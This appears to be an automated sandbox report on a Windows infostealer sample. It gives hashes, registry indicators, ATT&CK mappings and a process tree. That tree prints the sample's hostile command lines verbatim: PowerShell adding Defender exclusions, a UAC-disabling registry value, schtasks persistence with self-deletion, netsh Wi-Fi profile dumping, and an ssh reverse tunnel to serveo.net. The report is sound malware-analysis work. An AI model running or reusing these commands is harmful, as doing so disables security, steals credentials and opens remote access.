Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
10-02-2024 15:16
Static task
static1
Behavioral task
behavioral1
Sample
7e9a93c69aecfc2bbda9470fbd4556db.exe
Resource
win7-20231215-en
General
-
Target
7e9a93c69aecfc2bbda9470fbd4556db.exe
-
Size
14KB
-
MD5
7e9a93c69aecfc2bbda9470fbd4556db
-
SHA1
ab0e810472a897affac1a761b49595939f6897a9
-
SHA256
82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
-
SHA512
59abfa455c148c88959f992864de627857e950d9abb36b49efd979da4139a50847932d9577d658d0d793802ef5a6f6b91520440af2ff983dbf04126cf909d342
-
SSDEEP
384:1R8wtU1eai/zbM/XygkxOu6cyhLWi1fXlSW:1eCU1vi7blHhyhiij
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7e9a93c69aecfc2bbda9470fbd4556db.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation 7e9a93c69aecfc2bbda9470fbd4556db.exe Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation nklqjk3b.jqt.exe -
Executes dropped EXE 4 IoCs
pid Process 1652 nklqjk3b.jqt.exe 3512 nklqjk3b.jqt.exe 3240 nklqjk3b.jqt.exe 3588 nklqjk3b.jqt.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 nklqjk3b.jqt.exe Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 nklqjk3b.jqt.exe Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 nklqjk3b.jqt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7e9a93c69aecfc2bbda9470fbd4556db.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7e9a93c69aecfc2bbda9470fbd4556db.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 48 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4432 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3912 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2024 7e9a93c69aecfc2bbda9470fbd4556db.exe 112 powershell.exe 112 powershell.exe 3512 nklqjk3b.jqt.exe 3512 nklqjk3b.jqt.exe 3512 nklqjk3b.jqt.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2024 7e9a93c69aecfc2bbda9470fbd4556db.exe Token: SeDebugPrivilege 112 powershell.exe Token: SeDebugPrivilege 1652 nklqjk3b.jqt.exe Token: SeDebugPrivilege 3512 nklqjk3b.jqt.exe Token: SeDebugPrivilege 3240 nklqjk3b.jqt.exe Token: SeDebugPrivilege 3588 nklqjk3b.jqt.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 2024 wrote to memory of 112 2024 7e9a93c69aecfc2bbda9470fbd4556db.exe 83 PID 2024 wrote to memory of 112 2024 7e9a93c69aecfc2bbda9470fbd4556db.exe 83 PID 2024 wrote to memory of 112 2024 7e9a93c69aecfc2bbda9470fbd4556db.exe 83 PID 2024 wrote to memory of 1652 2024 7e9a93c69aecfc2bbda9470fbd4556db.exe 92 PID 2024 wrote to memory of 1652 2024 7e9a93c69aecfc2bbda9470fbd4556db.exe 92 PID 1652 wrote to memory of 1080 1652 nklqjk3b.jqt.exe 94 PID 1652 wrote to memory of 1080 1652 nklqjk3b.jqt.exe 94 PID 1080 wrote to memory of 3256 1080 cmd.exe 96 PID 1080 wrote to memory of 3256 1080 cmd.exe 96 PID 1080 wrote to memory of 3912 1080 cmd.exe 97 PID 1080 wrote to memory of 3912 1080 cmd.exe 97 PID 1080 wrote to memory of 4432 1080 cmd.exe 98 PID 1080 wrote to memory of 4432 1080 cmd.exe 98 PID 1080 wrote to memory of 3512 1080 cmd.exe 99 PID 1080 wrote to memory of 3512 1080 cmd.exe 99 PID 3512 wrote to memory of 432 3512 nklqjk3b.jqt.exe 100 PID 3512 wrote to memory of 432 3512 nklqjk3b.jqt.exe 100 PID 432 wrote to memory of 3888 432 cmd.exe 102 PID 432 wrote to memory of 3888 432 cmd.exe 102 PID 432 wrote to memory of 2944 432 cmd.exe 103 PID 432 wrote to memory of 2944 432 cmd.exe 103 PID 432 wrote to memory of 1808 432 cmd.exe 104 PID 432 wrote to memory of 1808 432 cmd.exe 104 PID 3512 wrote to memory of 2404 3512 nklqjk3b.jqt.exe 105 PID 3512 wrote to memory of 2404 3512 nklqjk3b.jqt.exe 105 PID 2404 wrote to memory of 904 2404 cmd.exe 107 PID 2404 wrote to memory of 904 2404 cmd.exe 107 PID 2404 wrote to memory of 3988 2404 cmd.exe 108 PID 2404 wrote to memory of 3988 2404 cmd.exe 108 PID 2404 wrote to memory of 624 2404 cmd.exe 109 PID 2404 wrote to memory of 624 2404 cmd.exe 109 PID 3512 wrote to memory of 3616 3512 nklqjk3b.jqt.exe 110 PID 3512 wrote to memory of 3616 3512 nklqjk3b.jqt.exe 110 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7e9a93c69aecfc2bbda9470fbd4556db.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 nklqjk3b.jqt.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 nklqjk3b.jqt.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7e9a93c69aecfc2bbda9470fbd4556db.exe"C:\Users\Admin\AppData\Local\Temp\7e9a93c69aecfc2bbda9470fbd4556db.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7e9a93c69aecfc2bbda9470fbd4556db.exe'; Add-MpPreference -ExclusionProcess '7e9a93c69aecfc2bbda9470fbd4556db'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
C:\Users\Admin\AppData\Local\Temp\nklqjk3b.jqt.exe"C:\Users\Admin\AppData\Local\Temp\nklqjk3b.jqt.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "nklqjk3b.jqt" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\nklqjk3b.jqt.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:3256
-
-
C:\Windows\system32\timeout.exetimeout /t 34⤵
- Delays execution with timeout.exe
PID:3912
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "nklqjk3b.jqt" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4432
-
-
C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe"C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:3512 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"5⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:3888
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵PID:2944
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"6⤵PID:1808
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"5⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:904
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid6⤵PID:3988
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"6⤵PID:624
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2237 serveo.net5⤵PID:3616
-
-
-
-
-
C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exeC:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exeC:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3588
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4B
MD5b166b57d195370cd41f80dd29ed523d9
SHA1fc15481319490c30a42e4dccfca757cc57193312
SHA2567e62ce15499878ca883e552b485ccc2f5dc86c7664c4446cc7f99a247f3f0ae1
SHA512813b0dfb3f08c93cb986df72be08493ac845e23601e8a2332140a72ab10fb5d41912f4925912d6d39b8493658fd062790eea642eca846f33d41f56d98d5ddd18
-
Filesize
847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
128KB
MD5869f82df0992dc2f5155d8f69fd1c9cf
SHA15b48d32aca1f7705c03e2bd592f68a2b9c9a7a22
SHA256d77412b72a893ee96e82d7efbd9fc2612176da00df5ebc066c13c303f558bcc9
SHA512b0f0e7f6354b64cac887600690531ba93f8aeb79e746fb9848c5f16f09931e3d8b5c2ad2a617fb9c978020450b4f717f9485d468b9c6098e6f319a59b26fad19